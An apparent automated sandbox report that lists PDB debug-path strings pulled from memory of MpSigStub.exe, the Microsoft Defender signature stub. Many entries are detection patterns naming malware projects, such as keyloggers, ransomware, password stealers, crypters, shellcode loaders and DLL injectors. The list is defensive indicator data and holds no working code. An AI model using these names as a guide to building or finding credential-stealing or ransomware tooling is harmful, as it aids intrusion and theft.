Source:	Binary string: \mywscript.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: 0.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdbx source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: \[Release.Win32]Clicker.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp
Source:	Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp
Source:	Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp
Source:	Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-registry-l1-1-0.pdb<b`- source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-com-l1-1-0.pdb' source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: mshta.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: ddraw.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp
Source:	Binary string: wbadmin.pdb source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp
Source:	Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: Unite.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: z:\Projects\Rescator\uploader\Debug\scheck.pdb] source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp
Source:	Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: Flipopia.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp
Source:	Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: Users\Legion\source\repos\curl\Release\curl.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: S\\server\\V.\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp
Source:	Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: 9D:\BuildScript.NET\c2patchdx11\pc\Build\Bin32\Crysis2.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: BugTrap.pdb] source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp
Source:	Binary string: dxtrans.pdb source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp
Source:	Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdb source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: fc.pdb0 source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: 4\ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: EFRE65.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: CryARr.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: SAVService.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: 7laIR+\|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: wevtutil.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.\\.\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp
Source:	Binary string: megasync.pdb source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: kernel32.pdb source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: winscard.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: stscast.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp
Source:	Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: Z:\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy$Winlogon_Shell$\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: security.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb3 source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: :\cef_2883\chromium_git\chromium\src\out\Release_GN_x86\vmxclient.exe.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp
Source:	Binary string: nafde.pdb source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: autofmt.pdb source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp
Source:	Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: PassView.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp
Source:	Binary string: dsquery.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp
Source:	Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: subst.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp
Source:	Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
